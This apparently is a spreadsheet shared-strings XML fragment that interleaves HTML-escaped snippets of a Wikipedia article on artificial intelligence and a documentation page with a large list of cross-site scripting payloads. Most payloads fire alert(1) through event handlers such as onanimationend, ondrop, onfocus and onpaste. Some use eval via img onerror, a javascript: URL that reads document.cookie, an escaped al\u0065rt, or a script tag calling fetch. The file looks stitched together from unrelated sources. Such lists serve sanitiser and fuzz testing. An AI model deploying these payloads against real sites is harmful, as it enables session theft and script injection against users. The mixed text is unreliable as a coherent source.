    <t>&lt;a href="/wiki/Ontology_(computer_science)" class="mw-redirect" title="Ontology (computer science)"&gt;Ontology &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;applet onbeforepaste="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;summary onkeydown="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;picture style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The philosophical position that &lt;a href="/wiki/John_Searle" title="John Searle"&gt;John Searle &lt;/a&gt; has named &lt;a href="/wiki/Strong_AI_hypothesis" class="mw-redirect" title="Strong AI hypothesis"&gt;"strong AI" &lt;/a&gt; states: "The appropriately programmed computer with the right inputs and outputs would thereby have a mind in exactly the same sense human beings have minds."&lt;sup id="cite_ref-Searle&amp;#39;s_strong_AI_404-0" class="reference"&gt;&lt;a href="#cite_note-Searle&amp;#39;s_strong_AI-404"&gt;&amp;#91;392&amp;#93; &lt;/a&gt; &lt;/sup&gt; Searle counters this assertion with his &lt;a href="/wiki/Chinese_room" title="Chinese room"&gt;Chinese room &lt;/a&gt; argument, which asks us to look &lt;i&gt;inside &lt;/i&gt; the computer and try to find where the "mind" might be.&lt;sup id="cite_ref-Chinese_room_405-0" class="reference"&gt;&lt;a href="#cite_note-Chinese_room-405"&gt;&amp;#91;393&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;area onmousedown="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;In the hospitality industry, Artificial Intelligence based solutions are used to reduce staff load and increase efficiency&lt;sup id="cite_ref-336" class="reference"&gt;&lt;a href="#cite_note-336"&gt;&amp;#91;325&amp;#93; &lt;/a&gt; &lt;/sup&gt; by cutting repetitive tasks frequency, trends analysis, guest interaction, and customer needs prediction.&lt;sup id="cite_ref-337" class="reference"&gt;&lt;a href="#cite_note-337"&gt;&amp;#91;326&amp;#93; &lt;/a&gt; &lt;/sup&gt; Hotel services backed by Artificial Intelligence are represented in the form of a chatbot,&lt;sup id="cite_ref-338" class="reference"&gt;&lt;a href="#cite_note-338"&gt;&amp;#91;327&amp;#93; &lt;/a&gt; &lt;/sup&gt; application, virtual voice assistant and service robots.</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Wallach, pp 55–73. </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="In_fiction"&gt;In fiction </t>
  </si>
  <si>
    <t>&lt;code oncut="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onmouseenter="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;center id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Terminology varies; see &lt;a href="/wiki/Algorithm_characterizations" title="Algorithm characterizations"&gt;algorithm characterizations &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;address oncopy="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;i onload=alert(1)&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;image onkeydown="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="pt-anonuserpage"&gt;Not logged in &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_archaeology" title="Glossary of archaeology"&gt;Archaeology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;963 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;th style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;code style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;legend onpaste="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;big style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;animatemotion onpointerenter=alert(1)&gt;XSS&lt;/animatemotion&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientific_theory" title="Scientific theory"&gt;Scientific theory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onpaste="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Soar_(cognitive_architecture)" title="Soar (cognitive architecture)"&gt;Soar &lt;/a&gt; (history):</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;marquee ondrop=alert(1) contenteditable&gt;drop here&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;b style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;link onpointerdown=alert(1)&gt;XSS&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;table onpointerup=alert(1)&gt;XSS&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;u draggable="true" ondrag="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">     &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;image ondrop=alert(1) contenteditable&gt;drop here&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Semiotics" title="Semiotics"&gt;Semiotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Heinz_von_Foerster" title="Heinz von Foerster"&gt;Heinz von Foerster &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onmousedown="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;body onunhandledrejection=alert(1)&gt;&lt;script&gt;fetch('//xyz')&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onmouseenter="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Hinton, G.; Deng, L.; Yu, D.; Dahl, G.; Mohamed, A.; Jaitly, N.; Senior, A.; Vanhoucke, V.; Nguyen, P.; Sainath, T.; Kingsbury, B. (2012). "Deep Neural Networks for Acoustic Modeling in Speech Recognition – The shared views of four research groups". &lt;i&gt;IEEE Signal Processing Magazine &lt;/i&gt;. &lt;b&gt;29 &lt;/b&gt; (6): 82–97. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2Fmsp.2012.2205597"&gt;10.1109/msp.2012.2205597 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Signal+Processing+Magazine&amp;amp;rft.atitle=Deep+Neural+Networks+for+Acoustic+Modeling+in+Speech+Recognition+%E2%80%93+The+shared+views+of+four+research+groups&amp;amp;rft.volume=29&amp;amp;rft.issue=6&amp;amp;rft.pages=82-97&amp;amp;rft.date=2012&amp;amp;rft_id=info%3Adoi%2F10.1109%2Fmsp.2012.2205597&amp;amp;rft.aulast=Hinton&amp;amp;rft.aufirst=G.&amp;amp;rft.au=Deng%2C+L.&amp;amp;rft.au=Yu%2C+D.&amp;amp;rft.au=Dahl%2C+G.&amp;amp;rft.au=Mohamed%2C+A.&amp;amp;rft.au=Jaitly%2C+N.&amp;amp;rft.au=Senior%2C+A.&amp;amp;rft.au=Vanhoucke%2C+V.&amp;amp;rft.au=Nguyen%2C+P.&amp;amp;rft.au=Sainath%2C+T.&amp;amp;rft.au=Kingsbury%2C+B.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;h2&gt;All the rest&lt;a class="headerlink" href="#all-the-rest" title="Permalink to this headline"&gt;¶&lt;/a&gt;&lt;/h2&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;data style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;image onmousedown="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;strong id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/strong&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Scharre, Paul, "Killer Apps:  The Real Dangers of an AI Arms Race", &lt;i&gt;&lt;a href="/wiki/Foreign_Affairs" title="Foreign Affairs"&gt;Foreign Affairs &lt;/a&gt; &lt;/i&gt;, vol. 98, no. 3 (May/June 2019), pp.&amp;#160;135–44.  "Today's AI technologies are powerful but unreliable.  Rules-based systems cannot deal with circumstances their programmers did not anticipate.  Learning systems are limited by the data on which they were trained.  AI failures have already led to tragedy.  Advanced autopilot features in cars, although they perform well in some circumstances, have driven cars without warning into trucks, concrete barriers, and parked cars.  In the wrong situation, AI systems go from supersmart to superdumb in an instant.  When an enemy is trying to manipulate and hack an AI system, the risks are even greater."  (p.&amp;#160;140.) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Alternating_decision_tree" title="Alternating decision tree"&gt;Decision tree &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;applet code="javascript:confirm(document.cookie);"&gt;</t>
  </si>
  <si>
    <t>&lt;rb onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/rb&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;plaintext id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;mark onpointerdown=alert(1)&gt;XSS&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;font id=x tabindex=1 onactivate=alert(1)&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;noembed id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;address id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;header id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;details draggable="true" ondragleave="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;content id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;385–542, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;BODY ONLOAD=alert('')&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Wakefield, Jane (15 June 2016). &lt;a rel="nofollow" class="external text" href="https://www.bbc.co.uk/news/uk-36528256"&gt;"Social media 'outstrips TV' as news source for young people" &lt;/a&gt;. &lt;i&gt;BBC News &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160624000744/http://www.bbc.co.uk/news/uk-36528256"&gt;Archived &lt;/a&gt; from the original on 24 June 2016. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=BBC+News&amp;amp;rft.atitle=Social+media+%27outstrips+TV%27+as+news+source+for+young+people&amp;amp;rft.date=2016-06-15&amp;amp;rft.au=Wakefield%2C+Jane&amp;amp;rft_id=https%3A%2F%2Fwww.bbc.co.uk%2Fnews%2Fuk-36528256&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;dfn id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;img alt="Wikipedia book" src="//upload.wikimedia.org/wikipedia/commons/thumb/8/89/Symbol_book_class2.svg/16px-Symbol_book_class2.svg.png" decoding="async" title="Wikipedia book" width="16" height="16" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/8/89/Symbol_book_class2.svg/23px-Symbol_book_class2.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/8/89/Symbol_book_class2.svg/31px-Symbol_book_class2.svg.png 2x" data-file-width="180" data-file-height="185" /&gt; &lt;b&gt;&lt;a href="/wiki/Book:Computer_science" class="mw-redirect" title="Book:Computer science"&gt;Book &lt;/a&gt; &lt;/b&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onmouseenter="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;rb onbeforecut="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onkeypress="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 19.3–4 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;FRAME SRC="javascript:alert('')</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1117%2F12.474462"&gt;10.1117/12.474462 &lt;/a&gt;. Archived from &lt;a rel="nofollow" class="external text" href="http://www.isd.mel.nist.gov/documents/albus/4DRCS.pdf"&gt;the original &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Searle&amp;#39;s_strong_AI-404"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Searle&amp;#39;s_strong_AI_404-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Artificial intelligence (AI) is becoming a mainstay component of law-related professions. In some circumstances, this analytics-crunching technology is using algorithms and machine learning to do work that was previously done by entry-level lawyers.&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (December 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t>&lt;big onkeyup="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The use of AI machines in the market in applications such as online trading and decision making has changed major economic theories.&lt;sup id="cite_ref-323" class="reference"&gt;&lt;a href="#cite_note-323"&gt;&amp;#91;312&amp;#93; &lt;/a&gt; &lt;/sup&gt; For example, AI based buying and selling platforms have changed the law of &lt;a href="/wiki/Supply_and_demand" title="Supply and demand"&gt;supply and demand &lt;/a&gt; in that it is now possible to easily estimate individualized demand and supply curves and thus individualized pricing. Furthermore, AI machines reduce &lt;a href="/wiki/Information_asymmetry" title="Information asymmetry"&gt;information asymmetry &lt;/a&gt; in the market and thus making markets more efficient while reducing the volume of trades&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (July 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Biological_naturalism" title="Biological naturalism"&gt;Biological naturalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;b oncontextmenu="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote class="templatequote"&gt;&lt;p&gt;The development of full artificial intelligence could spell the end of the human race. Once humans develop artificial intelligence, it will take off on its own and redesign itself at an ever-increasing rate. Humans, who are limited by slow biological evolution, couldn't compete and would be superseded. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;551–557 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;address onmouseover="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;form ondrop=alert(1) contenteditable&gt;drop here&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;em onpaste="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;em onbeforecopy="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onbeforecopy="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onkeypress="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;link onbeforecut="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;dfn oncut="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onkeypress="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;center onmousemove="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computer_security_compromised_by_hardware_failure" title="Computer security compromised by hardware failure"&gt;Hardware security &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFDyson1998" class="citation book"&gt;&lt;a href="/wiki/George_Dyson_(science_historian)" title="George Dyson (science historian)"&gt;Dyson, George &lt;/a&gt; (1998). &lt;a rel="nofollow" class="external text" href="https://archive.org/details/darwinamongmachi00dyso"&gt;&lt;i&gt;Darwin among the Machines &lt;/i&gt; &lt;/a&gt;. Allan Lane Science. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-7382-0030-9" title="Special:BookSources/978-0-7382-0030-9"&gt;&lt;bdi&gt;978-0-7382-0030-9 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Darwin+among+the+Machines&amp;amp;rft.pub=Allan+Lane+Science&amp;amp;rft.date=1998&amp;amp;rft.isbn=978-0-7382-0030-9&amp;amp;rft.aulast=Dyson&amp;amp;rft.aufirst=George&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fdarwinamongmachi00dyso&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;progress onmouseenter="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;html style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Convenient classes to extract links to follow from pages.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onpointerup=alert(1)&gt;XSS&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onmouseleave="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;main id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;colgroup ondrop=alert(1) contenteditable&gt;drop here&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;isindex style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;cite onmouseout="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_entomology_terms" title="Glossary of entomology terms"&gt;Entomology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;i onbeforecopy="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;noembed id=x tabindex=1 onactivate=alert(1)&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;image3 onpointerout=alert(1)&gt;XSS&lt;/image3&gt;</t>
  </si>
  <si>
    <t>&lt;multicol id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;script type="text/javascript" src="https://assets.readthedocs.org/static/javascript/readthedocs-analytics.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;span id="section-basics"&gt;</t>
  </si>
  <si>
    <t>al\u0065rt(1)</t>
  </si>
  <si>
    <t>&lt;samp onbeforepaste="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;area onpointermove=alert(1)&gt;XSS&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Computationalism and functionalism </t>
  </si>
  <si>
    <t>&lt;kbd draggable="true" ondragstart="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onpointerup=alert(1)&gt;XSS&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;base onpaste="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;em onmouseup="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;349–354, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onpointermove=alert(1)&gt;XSS&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Requirements_analysis" title="Requirements analysis"&gt;Requirements analysis &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;br oncopy="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;u id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/u&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;strong id=x tabindex=1 onfocus=alert(1)&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/sup&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;q id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;slot onkeydown="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;var ondrop=alert(1) contenteditable&gt;drop here&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt;, collected in &lt;cite class="citation book"&gt;&lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;McCarthy, John &lt;/a&gt; (1996). "10. Review of &lt;i&gt;The Question of Artificial Intelligence &lt;/i&gt;". &lt;i&gt;Defending AI Research: A Collection of Essays and Reviews &lt;/i&gt;. CSLI. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=10.+Review+of+The+Question+of+Artificial+Intelligence&amp;amp;rft.btitle=Defending+AI+Research%3A+A+Collection+of+Essays+and+Reviews&amp;amp;rft.pub=CSLI&amp;amp;rft.date=1996&amp;amp;rft.aulast=McCarthy&amp;amp;rft.aufirst=John&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;u onpointerenter=alert(1)&gt;XSS&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x:alert(alt) onerror=eval(src) alt=0&gt;</t>
  </si>
  <si>
    <t>&lt;span id="id1"&gt;</t>
  </si>
  <si>
    <t>&lt;slot id=x tabindex=1 onfocus=alert(1)&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onclick="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;code onpointerleave=alert(1)&gt;XSS&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onkeypress="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;footer id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/footer&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;head onmousemove="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;code id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;set onrepeat=alert(1) attributename=x dur=1s repeatcount=2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-bbc-alphago-8"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-bbc-alphago_8-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-bbc-alphago_8-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPoliLangdonMcPhee2008"&gt;Poli, Langdon &amp;amp; McPhee 2008 &lt;/a&gt;. &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-115"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-115"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;template onbeforepaste="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;333–381, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;audio id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;body class="wy-body-for-nav"&gt;</t>
  </si>
  <si>
